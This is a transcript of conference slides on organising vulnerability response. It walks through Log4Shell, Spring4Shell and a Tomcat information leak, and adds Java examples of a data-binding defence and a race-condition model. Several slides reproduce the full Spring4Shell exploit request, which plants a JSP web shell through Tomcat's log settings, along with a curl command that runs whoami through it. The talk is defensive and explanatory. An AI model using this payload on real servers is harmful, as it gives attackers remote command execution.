
How To 脆弱性対応 (How To Respond to Vulnerabilities)

cm-komuro
November 21, 2022


Slides from my talk at DevelopersIO Sapporo 2022.


Transcript

  1. How To 脆弱性対応 (How To Respond to Vulnerabilities), DevelopersIO Sapporo 2022

  2. What this talk covers: my own personal experience.

  3. Introduction

  4. Introduction
     • It is fair to say that no system is free of vulnerabilities.
     • The work is: detection, impact-scope investigation, workaround, permanent fix.
     • Everything after detection is a human judgment call.
     • If it is OSS, reading the code usually tells you most of what you need to know.
     • Security awareness is everyone's job.

  5. About me

  6. About me
     • Name: 小室 啓 (KOMURO HIRAKU)
     • Team: prismatix division, Fannaly team
     • Role: project manager
     • Interests: Java, Spring, vulnerability research

  7. prismatix

  8. Why are vulnerabilities bad?

  9. Leaving a vulnerability unaddressed is bad
     • Malware infection or backdoors
     • Theft of confidential data such as user information
     • Your system becomes a stepping stone for attacks on other targets
     • You get marked as an exploitable target
     • etc.

  10.  Vulnerability

  11. Vulnerabilities live at many layers
     • Infrastructure
     • OS
     • Middleware (runtime environment)
     • Application code
     • A wide variety of things
     (This talk focuses on this area.)

  12. Ways to check range from manual to automated
     • CVE: https://www.cve.org/Downloads
     • JVN: https://jvn.jp/
     • For Spring, VMware's vulnerability list: https://tanzu.vmware.com/security
     • Security services such as Snyk
     • Twitter

  13. Things I have investigated

  14. I read vulnerability fix commits and think them through
     • Verifying Spring Boot applications against the Log4j vulnerability (https://dev.classmethod.jp/articles/…, slug words: log4j rce spring boot research)
     • Impact investigation of CVE-… Spring4Shell (https://dev.classmethod.jp/articles/…, slug words: spring boot spring4shell)
     • Understanding CVE-… by reading Tomcat's fix commit (https://dev.classmethod.jp/articles/…, slug words: read tomca code for cve)

  15. Cited as reference material
     • piyolog: https://piyolog.hatenadiary.jp/entry/…
     • JVN: https://jvn.jp/vu/JVNVU…/index.html

  16. How we operate

  17. The response team

  18. The response team
     • An ad-hoc team of a few people is put together
     • A coordinator
     • People in charge of reproduction and impact investigation
     • People in charge of the workaround and root-cause analysis

  19. How the team moves
     • Initial response: check how large the impact is and whether we even have the dependency.
     • If there is likely impact and investigation is needed, spin up the team.
     • Split roles within the team.
     • Work in parallel.
     • Share information fairly frequently.

  20. The reproduction team

  21. The reproduction team
     • Reproduce the attack from the PoC code
     • Test both the existing configuration and a configuration changed to meet the exploit's conditions: a few broad patterns
     • Check whether adding the mitigation actually prevents the attack

  22. The root-cause investigation team

  23. Confirming the root cause
     • Read the fix commit
     • Read the blog posts published by the security companies and individuals who analysed it (almost all in English)
     • Run the reproduced setup under a debugger
     • Change log levels and read the output

  24. Concrete examples (covered if time permits)

  25. Concrete example: Log4Shell

  26. Log4Shell
     • CVE-…
     • The nasty vulnerability that caused an uproar at the end of the year
     • Anyone can execute it against a vulnerable target
     • Log4j is a well-known Logger implementation; the other representative implementation is Logback

  27. The behaviour we verified

  28. Log4Shell
     • The PoC was making the rounds before a CVE was even assigned
     • Exploitable even with little specialist knowledge
     • Arbitrary classes end up being injected dynamically

  29. Concrete example: Spring4Shell

  30. Spring4Shell
     • Abuses the mechanism by which Spring "reads the air" and goes looking for a matching property to bind
     • The conditions for execution are stricter than for Log4Shell
     • Java 9 and later are affected
     • The application is started as a war

  31. Java 9 and later are affected
     • module exists only from Java 9 on
     • Before Java 9 there is no module, so the PoC's attack method does not succeed
     https://www.oracle.com/corporate/features/… (article on understanding Java modules)

  32. The difference is the launch type
     • Applications started as a war are affected
     • Artifacts that start on their own, such as bootJar and bootWar, are not affected

  33. It tries to interpret the following request
     • A POST request with the following in the body
     • DataBinding goes looking for a class it can bind to
     class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2 %7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.get Parameter(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20wh ile((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))
     %3B%20%7D%20%7D%20%25%7Bsuffix%7Di &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp &class.module.classLoader.resources.context.parent.pipeline.first.directory=webap ps/ROOT &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwa r &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
  34. What is it trying to do?
     • Traverse from the ClassLoader to reach the AccessValve
     • Rewrite Tomcat's log output settings
     • Embed, as a string in the log output pattern, code that retrieves internal information
     • Change the log file's extension so that it becomes a JSP
     • Change the log output destination to Tomcat's public directory

  35. What happens when it runs
     • Executing the request turns the log file into a JSP
     • That JSP is exposed publicly
     %25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
     %{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1} i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
     curl -X GET 'http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=whoami'
     The output of whoami is returned.
  36. Launch type
     ClassLoader on which the attack works: WebappClassLoader
     ClassLoader on which the attack does not work: LaunchedURLClassLoader
     So, what is the difference?

  37. The difference is getResources (maybe)
     On WebappClassLoader, a no-argument getResources() is defined.
     https://tomcat.apache.org/tomcat-…-doc/api/org/apache/catalina/loader/WebappClassLoaderBase.html#getResources()

  38. The difference is getResources (maybe)
     On LaunchedURLClassLoader, no no-argument getResources() is defined.
     https://docs.oracle.com/javase/jp/…/docs/api/java.base/java/lang/ClassLoader.html#getResource(java.lang.String)

  39. Reaching the ClassLoader through binding
     class.module.classLoader → getClass(), getModule(), getClassLoader()
     class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20 if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream()
     %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
     If this ClassLoader is a WebappClassLoader, the no-argument getResources() exists.
  40. Traversed classes
     WebappClassLoader.getResources()
     → WebResourceRoot.getContext()
     → Context.getParent()
     → Container.getPipeline()
     → Pipeline.getFirst()
     → Valve (AccessValve)
  41. How it was fixed
     https://github.com/spring-projects/spring-framework/pull/…/files
     Property access to the ClassLoader is ignored.
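Spring's fix ignores property paths that reach the ClassLoader; the matching application-side defence, shown here as an added example that is neither the slides' nor Spring's own code, is to refuse binding of any `class.*` path on every WebDataBinder. The advice class name is my own; `@InitBinder` and `WebDataBinder.setDisallowedFields` are existing Spring MVC API.

```java
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

/*
 * Added example (hypothetical class name): a global @InitBinder that refuses to bind
 * any property path passing through "class" / "Class", so a request parameter such as
 *   class.module.classLoader.resources.context.parent.pipeline.first.pattern=...
 * is dropped by the binder before it can walk getClass().getModule().getClassLoader().
 */
@ControllerAdvice
public class ClassLoaderBindingGuard {

    // Patterns are matched against the full nested property path; the four variants
    // cover a leading "class"/"Class" segment and the same segment anywhere deeper.
    private static final String[] DENIED_PATHS = {"class.*", "Class.*", "*.class.*", "*.Class.*"};

    @InitBinder
    public void denyClassLoaderPaths(WebDataBinder binder) {
        // Disallowed fields are skipped during binding and recorded as suppressed fields,
        // so a request carrying such a parameter still binds its legitimate parameters.
        binder.setDisallowedFields(DENIED_PATHS);
    }
}
```

A controller-level @InitBinder that calls setDisallowedFields itself replaces this list rather than adding to it, so per-controller binders need the same check; an explicit allowlist via setAllowedFields is the stronger option where the bound fields are known.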

  42. Concrete example: Tomcat information leak

  43. Responses get mixed together
     • JVNVU…: information-disclosure vulnerability in Apache Tomcat caused by a race condition on HttpProcessor instances
     https://jvn.jp/vu/JVNVU…/index.html

  44. The reproduction conditions are strict
     • Hard to trigger at will from outside
     • But it can happen by chance
     • Affected: Apache Tomcat …-M… to …-M…; Apache Tomcat …-M… to …; Apache Tomcat …-M… to …; Apache Tomcat … to …

  45. Reading the fix commit
     https://github.com/apache/tomcat/commit/…
     • Object was changed to AtomicReference<Object>
     • takeCurrentProcessor() was added

  46. A rough understanding (my personal view)
     • An Object that is referenced from multiple processes
     • This Object writes the Response to the Socket
     • After a get(), some time later, a step assigns null to it
     • If, by chance, another process accesses the Object before null is stored, the same reference is returned
     • Multiple Responses are then written to the same Object
     https://dev.classmethod.jp/articles/… (slug words: read tomca code for cve)
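The two shapes the slides contrast, as an added toy model that is not Tomcat's code (all names except takeCurrentProcessor are mine): the old read-now-clear-later hand-off lets every concurrent reader receive the same processor, while getAndSet(null) on the AtomicReference hands it to exactly one caller. The model makes the deferred clear deliberately late so the sharing shows up deterministically instead of by chance.

```java
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicReference;

// Added example: a toy model of the hand-off pattern described on the slides, not Tomcat's code.
// Processor stands in for the per-connection object that writes a Response to the Socket.
public class ProcessorHandoff {
    static final class Processor { }

    // Pre-fix shape: a plain reference that is read with get() and set to null "a while later".
    private volatile Processor racySlot = new Processor();
    // Post-fix shape: the slides say Object became AtomicReference<Object>; typed here for clarity.
    private final AtomicReference<Processor> atomicSlot = new AtomicReference<>(new Processor());

    Processor getRacy() { return racySlot; }   // step 1: read the reference
    void clearRacy() { racySlot = null; }      // step 2, later: clear it (window between the steps)

    // Take-and-clear in one atomic step: at most one caller ever receives the processor.
    Processor takeCurrentProcessor() { return atomicSlot.getAndSet(null); }

    // Starts n threads that all try to obtain the processor; returns how many got a non-null one.
    static int countHolders(int n, boolean atomic) throws InterruptedException {
        ProcessorHandoff h = new ProcessorHandoff();
        AtomicInteger holders = new AtomicInteger();
        CountDownLatch go = new CountDownLatch(1);
        Thread[] ts = new Thread[n];
        for (int i = 0; i < n; i++) {
            ts[i] = new Thread(() -> {
                try { go.await(); } catch (InterruptedException e) { return; }
                Processor p = atomic ? h.takeCurrentProcessor() : h.getRacy();
                if (p != null) holders.incrementAndGet();
            });
            ts[i].start();
        }
        go.countDown();
        for (Thread t : ts) t.join();
        h.clearRacy();          // the deferred null assignment arrives after every reader has looked
        return holders.get();   // atomic: exactly one holder; racy: every thread saw the same processor
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println("racy get() + later clear, holders: " + countHolders(8, false));
        System.out.println("getAndSet(null) take,     holders: " + countHolders(8, true));
    }
}
```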

  47. Summary

  48. Summary
     • Vulnerabilities are close to home; responding cannot wait
     • Very little can be developed without using code written by other people
     • Developers should be more conscious of the OSS they rely on
     • Let's think about security together

  49. The end